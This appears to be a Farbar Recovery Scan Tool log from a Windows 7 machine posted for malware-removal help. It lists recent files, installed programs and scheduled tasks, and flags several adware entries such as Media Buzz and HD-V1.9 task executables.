2014-08-01 12:48 - 2014-08-01 12:48 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7
2014-08-01 12:48 - 2013-08-06 12:33 - 00000000 ____D () C:\Python27
2014-08-01 12:46 - 2014-05-02 17:41 - 00000000 ____D () C:\Users\miracle 5
2014-08-01 12:46 - 2013-04-05 11:21 - 00000000 ____D () C:\Users\Classic .NET AppPool
2014-08-01 12:46 - 2012-09-18 12:54 - 00000000 ____D () C:\Users\postgres
2014-08-01 12:46 - 2009-07-14 08:22 - 00000000 __RHD () C:\Users\Default
2014-08-01 12:46 - 2009-07-14 08:22 - 00000000 ___RD () C:\Users\Public
2014-08-01 11:57 - 2014-07-11 18:22 - 00000000 ____D () C:\Users\User\Desktop\maintainance
2014-08-01 11:56 - 2011-06-18 04:35 - 00000000 ____D () C:\Program Files\Notepad++
2014-08-01 11:50 - 2013-09-17 17:10 - 00000000 ____D () C:\Users\User\AppData\Local\CrashDumps
2014-08-01 11:50 - 2012-01-11 18:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinMerge
2014-08-01 11:50 - 2012-01-11 18:46 - 00000000 ____D () C:\Program Files\WinMerge
2014-08-01 11:47 - 2014-08-01 11:47 - 00000000 ____D () C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-08-01 11:47 - 2014-08-01 11:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-08-01 11:47 - 2011-07-31 13:20 - 00000000 ____D () C:\Program Files\WinRAR
2014-07-31 17:37 - 2014-07-31 17:37 - 00002121 _____ () C:\Users\User\Desktop\Tweaking.com - Windows Repair (All in One).lnk
2014-07-31 17:37 - 2014-07-31 17:37 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-07-31 17:36 - 2014-07-31 17:36 - 00000000 ____D () C:\Program Files\Tweaking.com
2014-07-31 17:16 - 2013-05-17 10:43 - 00000000 ____D () C:\Program Files\Free Download Manager
2014-07-31 17:15 - 2012-08-20 18:15 - 00000000 ____D () C:\Program Files\eclipse
2014-07-31 16:44 - 2014-07-31 16:44 - 00001163 _____ () C:\Users\Public\Desktop\Navicat Premium.lnk
2014-07-31 13:26 - 2014-07-31 13:04 - 00000000 ____D () C:\ProgramData\AVG2014
2014-07-31 13:26 - 2014-07-31 13:00 - 00000000 ____D () C:\Users\User\AppData\Local\Avg2014
2014-07-31 13:14 - 2011-07-05 00:26 - 00000000 ____D () C:\Program Files\XMind
2014-07-31 13:10 - 2014-07-31 13:10 - 00000000 ____D () C:\Users\User\AppData\Roaming\AVG2014
2014-07-31 13:06 - 2014-07-31 13:06 - 00000935 _____ () C:\Users\Public\Desktop\AVG 2014.lnk
2014-07-31 13:06 - 2014-07-31 13:06 - 00000000 ____D () C:\Users\User\AppData\Roaming\TuneUp Software
2014-07-31 13:06 - 2014-07-31 13:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-07-31 13:04 - 2012-02-05 10:41 - 00000000 ___HD () C:\$AVG
2014-07-31 13:04 - 2012-02-05 10:21 - 00000000 ____D () C:\Program Files\AVG
2014-07-31 13:00 - 2014-07-31 13:00 - 00000000 ____D () C:\Users\User\AppData\Local\MFAData
2014-07-31 12:19 - 2011-03-09 14:48 - 00947928 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-07-31 11:38 - 2014-07-30 15:03 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-07-31 11:38 - 2014-07-28 14:44 - 00338870 _____ () C:\Windows\PFRO.log
2014-07-31 11:36 - 2014-07-31 11:36 - 00000000 ____D () C:\Qoobox
2014-07-31 11:36 - 2014-07-31 11:35 - 00000000 ___SD () C:\32788R22FWJFW
2014-07-31 11:35 - 2014-07-31 11:35 - 00000000 ____D () C:\Windows\erdnt
2014-07-31 10:18 - 2014-07-30 16:01 - 00000000 ____D () C:\AdwCleaner
2014-07-31 10:09 - 2012-09-24 17:52 - 00007609 _____ () C:\Users\User\AppData\Local\Resmon.ResmonCfg
2014-07-30 15:50 - 2011-06-16 03:04 - 00000000 ____D () C:\Program Files\NetBeans 6.9.1
2014-07-30 15:14 - 2012-08-06 10:52 - 00460643 _____ () C:\git_shell_ext_debug.txt
2014-07-30 15:11 - 2014-07-30 15:11 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-07-30 15:09 - 2013-08-07 12:04 - 00000000 ____D () C:\Program Files\Mozilla Thunderbird
2014-07-30 15:06 - 2014-07-30 15:06 - 00776976 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys.1406712158422
2014-07-30 15:06 - 2014-07-30 15:06 - 00411552 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys.1406712158422
2014-07-30 14:50 - 2014-07-30 14:46 - 00004088 _____ () C:\Users\User\Desktop\Rkill.txt
2014-07-30 09:20 - 2014-07-30 09:20 - 00000687 _____ () C:\awhE80D.tmp
2014-07-29 19:10 - 2014-07-03 14:40 - 00002629 _____ () C:\Users\User\.dbshell
2014-07-29 16:50 - 2014-07-29 16:50 - 00000687 _____ () C:\awhF508.tmp
2014-07-29 12:35 - 2014-07-29 12:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Evernote
2014-07-29 10:51 - 2014-07-29 10:51 - 00000687 _____ () C:\awhDFF2.tmp
2014-07-29 09:15 - 2014-07-29 09:15 - 00000687 _____ () C:\awhE5AC.tmp
2014-07-28 15:09 - 2014-07-28 15:09 - 00000687 _____ () C:\awhE446.tmp
2014-07-28 15:05 - 2014-07-04 10:28 - 00000000 ____D () C:\Program Files\QuickTime
2014-07-28 15:01 - 2014-07-25 16:34 - 00000000 ____D () C:\Program Files\Bulk Rename Utility
2014-07-28 15:00 - 2014-07-28 15:00 - 00000000 ____D () C:\Windows\pss
2014-07-28 14:49 - 2014-07-28 14:49 - 00000687 _____ () C:\awhE040.tmp
2014-07-28 14:42 - 2014-06-30 10:33 - 00000000 ____D () C:\Program Files\TrustMediaViewerV1
2014-07-28 14:41 - 2013-09-30 17:00 - 00000000 ____D () C:\Users\User\Documents\Visual Studio 2012
2014-07-28 14:12 - 2014-07-28 14:12 - 00000687 _____ () C:\awh4D83.tmp
2014-07-28 14:10 - 2013-05-17 10:43 - 00000000 ____D () C:\Users\User\AppData\Roaming\Free Download Manager
2014-07-28 14:07 - 2014-07-28 14:07 - 00000000 _____ () C:\Windows\setuperr.log
2014-07-28 11:43 - 2014-07-28 11:43 - 00000000 ____D () C:\Users\User\Documents\iTools
2014-07-28 11:39 - 2012-01-13 15:52 - 00000000 ____D () C:\Users\User\AppData\Roaming\uTorrent
2014-07-28 11:38 - 2011-09-02 13:47 - 00000000 ____D () C:\Windows\Minidump
2014-07-28 11:38 - 2011-03-09 14:32 - 00000000 ____D () C:\Windows\Panther
2014-07-28 11:18 - 2014-07-28 11:18 - 00199672 _____ () C:\Users\User\Documents\cc_20140728_111739.reg
2014-07-28 11:11 - 2014-07-28 11:11 - 00000969 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-07-28 11:11 - 2014-07-28 11:11 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-07-28 11:11 - 2014-07-28 11:11 - 00000000 ____D () C:\Program Files\CCleaner
2014-07-28 10:09 - 2014-07-25 16:46 - 00000000 ____D () C:\Users\User\AppData\Local\1682
2014-07-28 09:23 - 2014-07-28 09:23 - 00000687 _____ () C:\awhE9F0.tmp
2014-07-25 17:58 - 2014-07-25 17:58 - 00000687 _____ () C:\awhF150.tmp
2014-07-25 17:53 - 2014-05-06 18:44 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-07-25 16:33 - 2013-10-08 10:36 - 00002187 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-07-25 14:46 - 2014-07-25 14:44 - 05981830 ____N (Tim Kosse) C:\Users\User\Downloads\FileZilla_3.9.0.1_win32-setup.exe
2014-07-25 09:21 - 2011-06-10 22:45 - 00000000 ___RD () C:\Program Files\Skype
2014-07-25 09:16 - 2014-07-25 09:16 - 00000687 _____ () C:\awhE954.tmp
2014-07-24 09:48 - 2013-10-17 11:38 - 00001012 _____ () C:\Users\User\Desktop\Dropbox.lnk
2014-07-24 09:48 - 2012-01-10 15:01 - 00000000 ____D () C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-07-24 09:13 - 2014-07-24 09:13 - 00000687 _____ () C:\awhDC4A.tmp
2014-07-23 10:52 - 2011-06-06 09:50 - 00231584 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-07-23 09:25 - 2014-07-23 09:25 - 00000687 _____ () C:\awhDDEF.tmp
2014-07-22 18:54 - 2014-07-22 15:53 - 00000000 ____D () C:\Users\User\AppData\Roaming\DBDesigner4
2014-07-22 18:23 - 2014-07-22 18:23 - 00000000 ____D () C:\Users\User\Documents\Toad Data Modeler
2014-07-22 15:22 - 2014-07-22 15:22 - 00000687 _____ () C:\awhE1D6.tmp
2014-07-22 15:17 - 2009-07-14 10:38 - 00032580 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-07-22 09:24 - 2014-07-22 09:24 - 00000687 _____ () C:\awhE465.tmp
2014-07-21 09:21 - 2014-07-21 09:21 - 00000687 _____ () C:\awhDBEC.tmp
2014-07-18 09:16 - 2014-07-18 09:16 - 00000687 _____ () C:\awhDCA8.tmp
2014-07-16 09:17 - 2014-07-16 09:17 - 00000687 _____ () C:\awhD8A2.tmp
2014-07-15 09:16 - 2014-07-15 09:16 - 00000687 _____ () C:\awhD9F9.tmp
2014-07-14 09:26 - 2014-07-14 09:26 - 00000687 _____ () C:\awhD9CA.tmp
2014-07-11 18:27 - 2014-06-13 17:36 - 00000000 ____D () C:\Users\User\AppData\Local\Adobe
2014-07-11 09:08 - 2014-07-11 09:08 - 00000687 _____ () C:\awhDCF6.tmp
2014-07-10 11:51 - 2014-07-10 11:51 - 00000804 _____ () C:\Users\User\out.sql
2014-07-10 10:09 - 2014-07-10 10:09 - 00000687 _____ () C:\awhDA18.tmp
2014-07-10 09:15 - 2014-07-10 09:15 - 00000687 _____ () C:\awhDC88.tmp
2014-07-09 12:36 - 2012-04-08 09:26 - 00699056 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-07-09 12:36 - 2011-06-06 09:57 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-07-09 11:26 - 2013-12-20 14:52 - 00001060 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 9.lnk
2014-07-09 09:14 - 2014-07-09 09:14 - 00000687 _____ () C:\awhDCD6.tmp
2014-07-08 09:49 - 2014-03-21 14:38 - 00000981 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ownCloud.lnk
2014-07-08 09:49 - 2014-03-21 14:38 - 00000969 _____ () C:\Users\User\Desktop\ownCloud.lnk
2014-07-08 09:49 - 2014-03-21 14:38 - 00000000 ____D () C:\Users\User\AppData\Local\ownCloud
2014-07-08 09:49 - 2014-03-21 14:38 - 00000000 ____D () C:\Program Files\ownCloud
2014-07-08 09:22 - 2014-07-08 09:22 - 00000687 _____ () C:\awhE0EC.tmp
2014-07-07 09:25 - 2014-07-07 09:25 - 00000687 _____ () C:\awhD74B.tmp
 
Files to move or delete:
====================
C:\Users\User\.mongorc.js
C:\Users\User\test.bat
 
 
Some content of TEMP:
====================
C:\Users\User\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpc7plhn.dll
C:\Users\User\AppData\Local\Temp\Quarantine.exe
C:\Users\User\AppData\Local\Temp\xmlUpdater.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => MD5 is legit
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
And here's the addition.txt
------------------------------------
Additional scan result of Farbar Recovery Scan Tool (x86) Version:2-08-2014
Ran by User at 2014-08-04 13:50:48
Running from E:\Myfiles and backup\svchost remover
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: AVG AntiVirus Free Edition 2014 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2014 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe Flash Player 14 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Flash Player 14 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Apple Application Support (HKLM\...\{D9DAD0FF-495A-472B-9F10-BAE430A26682}) (Version: 3.0.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{18D47FA1-0440-48D3-A7E0-DA09537FF471}) (Version: 7.1.1.3 - Apple Inc.)
AVG 2014 (HKLM\...\AVG) (Version: 2014.0.4716 - AVG Technologies)
AVG 2014 (Version: 14.0.3986 - AVG Technologies) Hidden
AVG 2014 (Version: 14.0.4716 - AVG Technologies) Hidden
AVG Web TuneUp (HKLM\...\AVG Web TuneUp) (Version: 3.1.0.6 - AVG Technologies)
CCleaner (HKLM\...\CCleaner) (Version: 4.16 - Piriform)
CommitMonitor 1.9.2.911 (HKLM\...\{DDD21BC1-FA1E-4DE0-82D8-5EB7727DE1AD}) (Version: 1.9.911 - Stefans Tools)
Dropbox (HKCU\...\Dropbox) (Version: 2.10.3 - Dropbox, Inc.)
Electric Mobile Studio 2012 version 1.10b (HKLM\...\{97EB6DAF-EEFC-46F5-A61E-D5F79192FF95}_is1) (Version: 1.10b - electric plum, LLC)
Evernote v. 5.5.2 (HKLM\...\{16730E6C-1114-11E4-9120-00163E98E7D0}) (Version: 5.5.2.4187 - Evernote Corp.)
FileZilla Client 3.9.0.2 (HKLM\...\FileZilla Client) (Version: 3.9.0.2 - Tim Kosse)
Google Chrome (HKLM\...\Google Chrome) (Version: 36.0.1985.125 - Google Inc.)
Google Talk (remove only) (HKLM\...\{226b64e8-dc75-4eea-a6c8-abcb496320f2}-Google Talk) (Version:  - )
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
iCloud (HKLM\...\{00A61104-74B5-4056-AD00-4397EF4FB141}) (Version: 3.1.0.40 - Apple Inc.)
iTunes (HKLM\...\{0718A90E-93AA-49AF-A4FE-0165ACD91DF0}) (Version: 11.2.2.3 - Apple Inc.)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.150.1 - McAfee, Inc.)
Media Buzz (HKLM\...\MediaBuzzV1mode6898) (Version: 1.1 - Media Buzz) <==== ATTENTION
Media Player (HKLM\...\MediaPlayerV1alpha583) (Version: 1.1 - Media Player) <==== ATTENTION
Media View (HKLM\...\MediaViewV1alpha678) (Version: 1.1 - Media View) <==== ATTENTION
Media Viewer (HKLM\...\MediaViewerV1alpha442) (Version: 1.1 - Media Viewer) <==== ATTENTION
Media Watch (HKLM\...\MediaWatchV1home1288) (Version: 1.1 - Media Watch) <==== ATTENTION
Mozilla Firefox 29.0 (x86 en-US) (HKLM\...\Mozilla Firefox 29.0 (x86 en-US)) (Version: 29.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 29.0 - Mozilla)
Network System Driver (HKLM\...\inethnfd) (Version: 1.0.0.3001 - ) <==== ATTENTION
Node.js (HKLM\...\{053D3A58-6440-4281-9495-31C07078724B}) (Version: 0.10.26 - Joyent, Inc. and other Node contributors)
Notepad++ (HKLM\...\Notepad++) (Version: 6.6.8 - Notepad++ Team)
ownCloud (HKLM\...\ownCloud) (Version: 1.6.1.3267 - ownCloud)
Poedit (HKLM\...\{68EB2C37-083A-4303-B5D8-41FA67E50B8F}_is1) (Version: 1.6.3 - Vaclav Slavik)
PremiumSoft Navicat Premium 9.1 (HKLM\...\PremiumSoft Navicat Premium_is1) (Version:  - PremiumSoft CyberTech Ltd.)
Python 2.7.4 (HKLM\...\{84ADC96C-B7E0-4938-9D6E-2B640D5DA224}) (Version: 2.7.4150 - Python Software Foundation)
QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Rich Media View (HKLM\...\RichMediaViewV1release335) (Version: 1.1 - Rich Media View) <==== ATTENTION
Skype Click to Call (HKLM\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.16 (HKLM\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.16.105 - Skype Technologies S.A.)
Snagit 11 (HKLM\...\{68723B04-57EC-11E1-A6A8-9E2D4824019B}) (Version: 11.1.0 - TechSmith Corporation)
SQL-Splitter 1.2.0.1 (HKLM\...\SQL-Splitter_is1) (Version:  - CoolFactory)
SSH Secure Shell (HKLM\...\{74E2CD0C-D4A2-11D3-95A6-0000E86CFDE5}) (Version:  - )
Sublime Text 2.0.2 (HKLM\...\Sublime Text 2_is1) (Version:  - )
Sublime Text Build 3059 (HKLM\...\Sublime Text 3_is1) (Version:  - Sublime HQ Pty Ltd)
TeamViewer 9 (HKLM\...\TeamViewer 9) (Version: 9.0.29947 - TeamViewer)
TortoiseSVN 1.8.4.24972 (32 bit) (HKLM\...\{F4E3A752-5AF9-4204-8416-8E58B9041A37}) (Version: 1.8.24972 - TortoiseSVN)
Tweaking.com - Windows Repair (All in One) (HKLM\...\Tweaking.com - Windows Repair (All in One)) (Version: 2.8.3 - Tweaking.com)
Video Player (HKLM\...\Video Player) (Version: 1.1 - Video Player) <==== ATTENTION
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VisualSVN Server 2.7.7 (HKLM\...\{1AA8EDDB-569D-4008-B3D6-0D64586900A5}) (Version: 2.7.7.0 - VisualSVN Ltd.)
Webexp Enhanced (HKLM\...\Webexp Enhanced) (Version: 1.1 - Webexp Enhanced) <==== ATTENTION
Winamp (HKLM\...\Winamp) (Version: 5.65  - Nullsoft, Inc)
Winamp Detector Plug-in (HKCU\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
WinMerge 2.12.4 (HKLM\...\WinMerge_is1) (Version: 2.12.4 - Thingamahoochie Software)
WinRAR 4.01 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.01.0 - win.rar GmbH)
WordWeb (HKLM\...\WordWeb) (Version: 7 - WordWeb Software)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
 
==================== Restore Points  =========================
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2014-07-30 18:50 - 2014-07-30 18:49 - 00000833 ____A C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0F661297-F6CD-4EAF-9440-83B17111CDEE} - System32\Tasks\cleanmgr => C:\Windows\System32\cleanmgr.exe [2009-07-14] (Microsoft Corporation)
Task: {10C2ABB9-D163-4053-A153-272108B0BE0C} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-1 => C:\Program Files\SavePass\SavePass-codedownloader.exe
Task: {19CA6FD8-2563-4B2B-A981-74460943CF0B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2013-10-08] (Google Inc.)
Task: {1F965C1F-86AC-409C-A56E-7B1C631E35DD} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-07-09] (Adobe Systems Incorporated)
Task: {28F4F69A-F5DE-4960-AF4D-0EAA3F9CAD99} - System32\Tasks\{D59763BF-06B8-404B-95FF-421CD5C22255} => C:\Program Files\Skype\\Phone\Skype.exe [2014-05-08] (Skype Technologies S.A.)
Task: {3206B607-DB71-425F-940E-C816E31FD593} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-6 => C:\Program Files\SavePass\SavePass-novainstaller.exe
Task: {367973C4-3E06-4099-8A4B-C8ABBE2DF971} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-11 => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-11.exe
Task: {4149056B-A547-4B75-8DDE-52B305988538} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-6 => C:\Program Files\HD-V1.9\HD-V1.9-novainstaller.exe <==== ATTENTION
Task: {446F91DD-E862-4FC6-A4AC-7120EFF603C4} - System32\Tasks\{42C70AC3-B6DA-41F5-B6E5-909EBB1BF66F} => Chrome.exe http://ui.skype.com/ui/0/6.9.0.106/en/go/help.faq.installer?LastError=1638
Task: {44B1EBC4-F3C9-4747-AD60-8A14FE9A08CA} - System32\Tasks\{B7C01B5D-C31F-49D7-8660-EE32FB733191} => Chrome.exe http://ui.skype.com/ui/0/6.9.0.106/en/go/help.faq.installer?LastError=1638
Task: {47F7A1AB-F383-4459-BF5D-B641A5A6A43F} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-10 => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-10.exe <==== ATTENTION
Task: {608758A9-D0C7-4606-8D6E-5086B51BB960} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5 => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-5.exe <==== ATTENTION
Task: {60F0A6E3-D33E-4099-BC95-6C98F4C7ADB5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2013-10-08] (Google Inc.)
Task: {6240C4AD-D1D6-4C34-95DF-7ADFE8D01EC6} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-2 => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-2.exe <==== ATTENTION
Task: {690783CD-1C38-415E-AA48-1E081A1FF466} - System32\Tasks\SDMsgUpdate (SD) => C:\Program Files\SmartDraw 2013\Messages\SDNotify.exe
Task: {6BE7A4E0-1DFB-46A3-BA4D-3DBB74CEBFEA} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-1 => C:\Program Files\HD-V1.9\HD-V1.9-codedownloader.exe <==== ATTENTION
Task: {74987F6F-A159-45E2-8C24-0C73037232B8} - System32\Tasks\AdobeAAMUpdater-1.0-SUMAN-User => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-03-06] (Adobe Systems Incorporated)
Task: {7516F39F-B6A3-4E56-BFAC-264330D3F6CB} - System32\Tasks\{A3610ECF-1343-4654-A3C6-AB691BE4C498} => Chrome.exe http://ui.skype.com/ui/0/6.9.0.106/en/go/help.faq.installer?LastError=1638
Task: {754B1E79-F16F-4262-ABCF-44BD5A13EB89} - System32\Tasks\{3DCD7273-2F81-4C04-89C5-8844A1F8152F} => Chrome.exe http://ui.skype.com/ui/0/6.9.0.106/en/go/help.faq.installer?LastError=1638
Task: {7EE56EA1-64B5-4425-AA91-BFA549179B1F} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5_user => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-5.exe <==== ATTENTION
Task: {847149B5-061A-435F-820D-D11252562C03} - System32\Tasks\{FD3D34B4-B3B7-47E4-BCAB-08C318DB3D9B} => Chrome.exe http://ui.skype.com/ui/0/6.9.0.106/en/go/help.faq.installer?LastError=1638
Task: {8F88F311-BC27-47F3-A17C-342CD8A3F684} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-4 => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-4.exe <==== ATTENTION
Task: {9387EA93-54F1-4BB0-9F7A-E9C3DA13AC12} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-7 => C:\Program Files\SavePass\SavePass-nova.exe
Task: {975A1218-C56A-49DE-8EE8-84180F098A16} - System32\Tasks\{7ED4128B-966D-4B70-9E5D-182A05C6CCF4} => Chrome.exe http://ui.skype.com/ui/0/6.11.0.102/en/go/help.faq.installer?LastError=1638
Task: {992238EF-0B17-4631-A262-77517E0F1091} - System32\Tasks\{C3B129DF-3BCD-4C63-83C0-0B001AC8E8C8} => Chrome.exe http://ui.skype.com/ui/0/6.11.0.102/en/go/help.faq.installer?LastError=1638
Task: {9C2F5841-E3D1-4EFB-84B0-68B60F5C5292} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-7 => C:\Program Files\HD-V1.9\HD-V1.9-nova.exe <==== ATTENTION
Task: {A2264811-E7DC-4C59-99D2-39C2E2C81508} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-2 => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-2.exe
Task: {AE679B3F-752A-4259-902F-9BBBCA70FE8B} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5_user => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-5.exe
Task: {AFFDF1FD-7370-423D-A8B2-88CB846ECAE2} - System32\Tasks\{9A279C7D-03AB-4B29-8FD7-28C8ADD5CE4D} => Chrome.exe http://ui.skype.com/ui/0/6.9.0.106/en/go/help.faq.installer?LastError=1638
Task: {BF64A047-C491-4315-A418-CF2ED1FF937A} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-07-23] (Piriform Ltd)
Task: {DD6C9195-F537-44F8-8EBE-D39DE85DDCB5} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-4 => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-4.exe
Task: {DEFD6723-2CEA-4C7C-9121-7DED1FAD301E} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-11 => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-11.exe <==== ATTENTION
Task: {E3FFFB8B-6A51-448C-BC99-8E86847EB9E9} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-10 => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-10.exe
Task: {E9AF7E85-2F5D-4F56-931B-C2AB7E1E9CC7} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5 => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-5.exe
